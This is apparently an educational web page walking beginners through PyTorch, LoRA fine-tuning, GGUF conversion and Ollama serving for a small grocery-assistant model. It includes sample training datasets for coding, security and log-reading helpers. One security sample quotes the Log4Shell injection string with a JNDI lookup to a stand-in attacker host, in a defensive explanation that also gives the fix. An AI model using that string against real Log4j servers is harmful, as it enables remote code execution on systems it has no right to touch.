A step-by-step tour of PyTorch, neural networks, training, the secret format Ollama uses, and how your typed question actually turns into an answer. No PhD required — middle-school math is enough.
Imagine a really, really fast calculator. Not just one that adds two numbers — one that can multiply millions of numbers at once, AND remember every step it took. That's PyTorch. It's a free software library that runs on your computer and powers most of the AI you hear about.
PyTorch has two superpowers:
You don't have to write PyTorch code to use this project. The trainer container does all of that. But knowing what's happening inside helps everything else make sense.
A neural network is built from tiny math units called neurons. A single neuron does something a 5th grader could do:
That's it. One neuron is dumb. But when you stack thousands of them in layers, and the output of one layer becomes the input of the next, magical things happen — the network learns to recognize cats in photos, translate French, or answer grocery questions.
Every "weight" is a number PyTorch stores in a tensor. The famous "135 million parameter model" we use? That's 135 million weights, sitting in tensors, ready to be tuned.
Three things to know. That's it.
Every layer of a model is mostly just multiplication-and-adding. Lots of it.
inputs: [1, 2, 3]
weights: [4, 5, 6]
output = 1×4 + 2×5 + 3×6
= 4 + 10 + 18
= 32
This is called a "dot product." A neural network does millions of these per second.
After the sum, the result goes through an "activation function" that decides if the neuron speaks up.
This one is called ReLU. If x is negative, output 0. If positive, pass it through. Simple, but it's the workhorse of modern AI.
Training is just: which way should I tweak the knobs to make the answer better?
PyTorch's autograd computes the slope automatically. The optimizer takes one small step downhill. Repeat thousands of times → the model learns.
Models can't read English. They can only do math. So before any text reaches the model, a piece of code called the tokenizer chops it into pieces and replaces each piece with a number.
The pieces aren't always whole words. Common words get one number; rare words get split. "unbelievable" might split into "un" + "believ" + "able" — three tokens. Each token has an ID from a fixed "vocabulary" (usually around 32,000 – 200,000 entries).
This is also why we say things like "this model has a 2,048 token context" — that's how many tokens it can pay attention to at once.
Four steps, repeated thousands of times. That's all training is.
Show the model one training example and let it guess. For us: "How do I pick a ripe avocado?" The model produces some sequence of tokens.
Compare its guess to the correct answer in our dataset. The loss is a single number — bigger if the guess was bad, smaller if it was close.
PyTorch's autograd walks backwards through every step, computing how much each weight contributed to the error. This is the "gradient."
The optimizer (we use Adam) nudges each weight a tiny bit in the direction that reduces the loss. Just a little — too big a nudge and we overshoot.
Here's a problem: our model has 135 million weights. Training all of them takes a lot of memory and time. And we only have 65 examples — not nearly enough to retrain the whole thing without breaking what it already knows.
LoRA (Low-Rank Adaptation) is the trick. Instead of changing the millions of original weights, we:
It's like teaching a Michelin-starred chef one new dish — you don't send them back to culinary school. You just show them the recipe.
After training, PyTorch saves the model as a bunch of files: weights in .safetensors, settings in config.json, the tokenizer in another folder. That's fine for Python, but Ollama wants something simpler — one file with everything in it.
That format is called GGUF (it stands for "GGML Universal Format" — a bit of an acronym sandwich). Think of it like zipping a complicated folder of files into a single ZIP. Plus, GGUF stores the numbers in a clever way that makes the model fast to load and small to store, especially on regular computers without expensive GPUs.
We use a tool called llama.cpp (a famous open-source project) to do the conversion. One Python command, one file out.
output/merged/
├── config.json
├── model.safetensors (260 MB)
├── tokenizer.json
├── tokenizer_config.json
└── special_tokens_map.json
5 files · ~270 MB total
output/
└── grocery-slm.gguf (270 MB)
1 file · everything inside
Tokenizer, weights, settings — all baked in.
A GGUF on its own is just weights. To tell Ollama how to use the model, we add a Modelfile. It's a tiny text file with simple instructions.
# Where to find the weights
FROM ./grocery-slm.gguf
# How to format messages before the model sees them
TEMPLATE """{{ if .System }}<|im_start|>system
{{ .System }}<|im_end|>
{{ end }}<|im_start|>user
{{ .Prompt }}<|im_end|>
<|im_start|>assistant
"""
# Generation knobs
PARAMETER temperature 0.6
PARAMETER top_p 0.9
# The personality (system prompt)
SYSTEM """You are GroceryGPT..."""
FROM
Points to the GGUF file with the weights. The starting line.
TEMPLATE
The exact text format the model expects. Different model families use different special tokens.
PARAMETER
Generation knobs — temperature (creativity), top_p (variety), num_ctx (context window).
SYSTEM
A hidden message sent before every conversation. Sets the personality.
The key word here is streaming. The model writes its answer one token at a time. We don't wait for the whole thing — each token gets sent back to your screen immediately. That's why answers feel like they're being typed.
Softmax, in three minutes.
After all the math, the model spits out a list of raw scores — one for every possible next token (around 49,000 of them). These are called logits. They're not probabilities yet — just preferences.
To turn them into probabilities, we use a function called softmax. It does two things:
Then we don't always pick the highest one. That would be boring and repetitive. Instead we sample: roll dice weighted by the probabilities. The "temperature" parameter controls how spiky vs flat those probabilities are. Low temperature = always pick the favorite. High temperature = more variety, more risk of nonsense.
The whole system is dataset-shaped. Swap out data/dataset.jsonl, retrain, and you've got a completely different specialist. Here are three real templates to start from.
One example per line. Each line is a JSON object with a messages array. Two roles: user (the question) and assistant (the perfect answer you wish the model would give).
{"messages": [
{"role": "user", "content": "..."},
{"role": "assistant", "content": "..."}
]}
Aim for 50+ diverse examples to start. More is better, but quality > quantity. Real, varied, accurate examples beat 1,000 copy-pasted near-duplicates every time.
For making a coding assistant. Each example is a programming question and a clean, runnable solution.
{"messages":[{"role":"user","content":"How do I read a file line by line in Python?"},{"role":"assistant","content":"Use a context manager — it auto-closes the file:\n\n```python\nwith open('file.txt') as f:\n for line in f:\n print(line.rstrip())\n```\n\nThis streams one line at a time, so it works on huge files."}]}
{"messages":[{"role":"user","content":"Reverse a string in JavaScript."},{"role":"assistant","content":"```javascript\nconst reversed = str.split('').reverse().join('');\n```\n\nSplit into characters, reverse the array, join back. Note: this breaks on emoji and some Unicode — use Array.from(str) for those."}]}
{"messages":[{"role":"user","content":"What's the difference between let and const in JS?"},{"role":"assistant","content":"`const` means you can't reassign the variable. `let` means you can. Both are block-scoped (unlike var). Default to const; use let only when you genuinely need to reassign."}]}
Your own commits, Stack Overflow Q&A, public docs of libraries you love. Pair each question with a tested answer.
Escape newlines properly (\n) — invalid JSON will silently skip lines. Use the same code-fence style (```python) everywhere.
Include a couple "explain this" examples too — not just code generation. Helps the model talk about code, not just write it.
For a security/networking helper. Ports, protocols, CVEs, common attacks, headers — concise, accurate, citable.
{"messages":[{"role":"user","content":"What's the default port for SSH?"},{"role":"assistant","content":"SSH uses TCP port 22 by default, assigned by IANA. Many admins move it to a non-standard port to reduce noisy scans — that's security through obscurity, not real protection. Real protection comes from key-based auth and disabling password login."}]}
{"messages":[{"role":"user","content":"What is CVE-2021-44228?"},{"role":"assistant","content":"Log4Shell — a critical remote code execution flaw in Apache Log4j 2 (versions < 2.17.0). Attackers can trigger it by getting a vulnerable app to log a crafted string like ${jndi:ldap://attacker.com/x}. CVSS score: 10.0. Fix: upgrade Log4j; if you can't, set log4j2.formatMsgNoLookups=true."}]}
{"messages":[{"role":"user","content":"Explain the X-Frame-Options HTTP header."},{"role":"assistant","content":"X-Frame-Options tells browsers whether your page can be embedded in an <iframe> on other sites. Values: DENY (never), SAMEORIGIN (only your own site), or ALLOW-FROM uri (deprecated). It prevents clickjacking. Modern alternative: Content-Security-Policy frame-ancestors directive, which is more flexible."}]}
{"messages":[{"role":"user","content":"What does a SYN flood attack do?"},{"role":"assistant","content":"It exploits the TCP 3-way handshake. The attacker sends many SYN packets but never replies to the SYN-ACK. The target's connection table fills with half-open connections, eventually refusing legitimate traffic. Mitigations: SYN cookies (defer state allocation until ACK arrives), connection rate limits, and proper firewall rules."}]}
NIST NVD (CVE database), MITRE ATT&CK, RFC documents, OWASP cheat sheets. All free and authoritative.
Accuracy matters more here than anywhere — wrong CVE details could mislead someone in a real incident. Verify every answer.
Add a system-prompt rule: "If you're not sure, say so." Small models will confidently invent CVEs otherwise.
For a log-whisperer. Paste an obscure log line, get a plain-English explanation and likely causes.
{"messages":[{"role":"user","content":"What does this mean?\n2024-03-15 14:22:01 ERROR [pool-1-thread-3] com.app.UserService - Failed to authenticate user: java.sql.SQLException: Connection timeout after 30000ms"},{"role":"assistant","content":"A Java app (UserService) tried to look up a user in a database to authenticate them, but the database query timed out after 30 seconds. Most likely causes:\n\n1. The database is down or unreachable.\n2. Connection pool exhausted — all connections in use.\n3. A slow query is holding locks.\n4. Network issue between app and DB.\n\nCheck DB status first, then connection pool metrics, then query logs."}]}
{"messages":[{"role":"user","content":"Nginx log: 192.168.1.5 - - [12/Mar/2024:10:14:33 +0000] \"GET /api/users HTTP/1.1\" 404 312 \"-\" \"curl/7.81.0\""},{"role":"assistant","content":"An Nginx access log entry. Breaking it down:\n• 192.168.1.5 — client IP\n• 12/Mar/2024:10:14:33 — timestamp\n• GET /api/users — request method + path\n• 404 — status code: resource not found\n• 312 — bytes sent in response body\n• curl/7.81.0 — User-Agent (someone using curl, not a browser)\n\nThe 404 means /api/users doesn't exist on this server. Check your route config or if the request should go to a different upstream."}]}
{"messages":[{"role":"user","content":"systemd: 'sshd.service: Main process exited, code=killed, status=9/KILL'"},{"role":"assistant","content":"The SSH daemon (sshd) was killed by signal 9 (SIGKILL). Signal 9 is uncatchable — something forcibly terminated it. Common causes:\n\n1. The OOM killer ran out of memory and killed sshd.\n2. Someone ran `kill -9` manually.\n3. A misbehaving init script.\n\nCheck `dmesg | grep -i oom` for memory pressure, and `journalctl _COMM=systemd` around the timestamp for context."}]}
Your own logs (redact PII!) — nginx, syslog, application logs. Public dataset: LogHub has labeled samples.
Strip secrets, IPs, usernames, real CVE IDs from your own logs before training. Models can leak training data verbatim.
Cover multiple log formats — nginx, systemd, JSON-structured logs, stack traces. Each looks different.
data/dataset.jsonl (overwrite the grocery one).SYSTEM line in Modelfile to match the new persona.docker compose --profile train run --rm trainer — takes 5–15 min on CPU.docker compose restart ollama-init and try your new model.The math engine. Defines the tensors, runs the forward + backward pass, and lets PEFT bolt LoRA onto the model.
A library that wraps PyTorch with model-specific knowledge. Knows the architecture of SmolLM2 (and dozens of others), how to tokenize for it, and how to load weights from the Hugging Face Hub.
"Parameter Efficient Fine-Tuning." Implements LoRA. About 50 lines of config and PyTorch knows to freeze the base and add tiny trainable adapters.
The legendary open-source project that started CPU inference of LLMs. We use its Python converter to turn PyTorch weights into a single GGUF file.
The "Docker for LLMs." Loads GGUF files, manages models, and serves a simple HTTP API for chat. Auto-detects whether to use GPU or CPU.
Packages every service (trainer, ollama, init, web UI) into containers so it runs the same on any computer. docker compose up brings the whole stack online.
A web server. We use it for two things: serving the HTML chat page and proxying API requests to Ollama (avoids CORS pain).
The best free resources to go further. All of these are written by the people who built the things.
Start with "Learn the Basics" — a 60-minute walkthrough.
The most beautiful visual explanations of backpropagation and how networks work. Truly accessible.
2-hour video where Andrej Karpathy codes a tiny language model live. Worth every minute.
The library we use for loading and training. The "Pipelines" section is the easiest entry point.
How to fine-tune with adapters. Includes recipes for many model families.
If you want to see the math. Surprisingly readable; the key idea fits on one page.
The 2017 paper that introduced the Transformer architecture — the foundation of GPT, Claude, every modern LLM.
Hundreds of pre-made models you can `ollama pull` instantly. Great for experimenting.
/api/chat, /api/generate, streaming, tools — everything our web UI talks to.
Karpathy's minimal GPT in ~300 lines of PyTorch. The whole transformer in one readable file.
The base model we fine-tune. See its card for benchmarks and training details.
The exact byte layout of a GGUF file. Useful if you ever need to debug or build tooling.
Here's the famous autograd demo. PyTorch tracks every operation you do on a tensor with requires_grad=True and lets you compute derivatives automatically.
import torch
# A number we want to find the slope at
x = torch.tensor([3.0], requires_grad=True)
# A function: y = x²
y = x ** 2
# Compute the slope of y with respect to x
y.backward()
# dy/dx at x=3 → 2x = 6
print(x.grad) # tensor([6.])
Now imagine instead of one number, x is 135 million weights, and instead of x² it's a whole neural network with 32 layers. Same idea — PyTorch handles all the bookkeeping.
Say a neuron has these settings:
w₁ = 0.5, w₂ = -0.3, w₃ = 0.8b = 0.1max(0, x))And these inputs: x₁ = 2, x₂ = 4, x₃ = 1
sum = 0.5×2 + (-0.3)×4 + 0.8×1 + 0.1
= 1.0 + -1.2 + 0.8 + 0.1
= 0.7
output = ReLU(0.7) = max(0, 0.7) = 0.7
That's the entire computation in one neuron. A real model just does this for millions of neurons, organized in layers where each layer's outputs feed the next.
When a whole layer of neurons processes inputs at once, we do it with matrix multiplication. Say 3 inputs going into 2 neurons:
inputs = [1, 2, 3] (1 × 3 matrix)
weights = [[0.5, -0.1, 0.2],
[0.3, 0.4, 0.7]] (2 × 3 matrix)
each output = dot product of inputs with one weight row:
neuron 1: 1×0.5 + 2×(-0.1) + 3×0.2 = 0.9
neuron 2: 1×0.3 + 2×0.4 + 3×0.7 = 3.2
Big neural networks are stacks of these matrix multiplications, with activation functions in between. GPUs are amazing at matrix multiplication; that's why they took over AI.
Imagine you're standing on a hill in fog. You can't see the bottom, but you can feel which way is downhill. So you take a small step downhill. Repeat. Eventually you reach a valley.
That's it. The "hill" is the loss function. The "downhill direction" is the negative of the gradient. The "step size" is the learning rate. Doing this for every weight in the model — at once, automatically — is what training is.
The tokenizer is built by a process called BPE. It scans a huge pile of text and finds the most common character pairs, merging them into single tokens, then repeats. Over thousands of merge steps you end up with a vocabulary that has common pieces as whole tokens, and rare words as smaller chunks.
Examples for SmolLM2's tokenizer (illustrative):
"the" → 1 token
"avocado" → 1 token
"GroceryGPT" → 4 tokens ("G", "rocery", "GP", "T")
"floccinaucinihilipilification" → 11 tokens
Numbers get tokenized too — usually each digit is its own token. That's why language models are sometimes bad at math involving long numbers.
Stripped down to the essential lines — this is exactly what Hugging Face's Trainer does for us:
optimizer = torch.optim.AdamW(model.parameters(), lr=2e-4)
for epoch in range(num_epochs):
for batch in dataloader:
# 1. forward
outputs = model(**batch)
loss = outputs.loss
# 2. backward
loss.backward()
# 3. update
optimizer.step()
optimizer.zero_grad()
Five lines do the work. The rest of Hugging Face is configuration around this core — batching, logging, checkpointing, distributed training.
A weight matrix in the model is called W — let's say it's 768 × 768 (about 590,000 numbers). LoRA replaces "tweak W directly" with this:
W_new = W_frozen + B × A
where:
A is shape (8 × 768) — 6,144 numbers
B is shape (768 × 8) — 6,144 numbers
The 8 is the "rank" — the only hyperparameter that really matters. We use 8.
During training we only update A and B — 12,288 numbers instead of 590,000 — a 50× saving per layer. At the end we precompute B × A once and add it into W_frozen. The result is a normal model file with no LoRA machinery at runtime.
PyTorch weights are usually stored as 32-bit floating point numbers — 4 bytes each. For 135M parameters that's 540 MB.
GGUF can store the same weights at lower precision. Each weight takes fewer bits, but the model behaves almost the same. Common levels:
F32 32 bits/weight full precision 100% size
F16 16 bits/weight half precision 50%
Q8_0 8 bits/weight tiny accuracy loss 25%
Q4_K_M ~4.5 bits/weight some quality loss ~14%
Q2_K 2 bits/weight noticeable degradation 6%
In this project we ship F16 because 135M is already tiny — quantizing further saves only a few MB and isn't worth the quality drop. For big models (7B+) you'll see Q4_K_M everywhere because it's a great trade-off.
Softmax turns raw scores ("logits") into probabilities. The formula:
softmax(x_i) = exp(x_i) / Σ exp(x_j)
Worked example. Logits: [8.2, 7.5, 5.1, 1.0]
exp(8.2) = 3640
exp(7.5) = 1808
exp(5.1) = 164
exp(1.0) = 2.7
sum = 3640 + 1808 + 164 + 2.7 = 5615
prob(herbs) = 3640 / 5615 = 0.648
prob(food) = 1808 / 5615 = 0.322
prob(meat) = 164 / 5615 = 0.029
prob(bikes) = 2.7 / 5615 = 0.0005
Temperature changes this. The model divides logits by T before softmax. T=2 makes everything flatter (more random). T=0.3 makes the highest probability dominate (more deterministic). We use T=0.6 — a nice middle ground.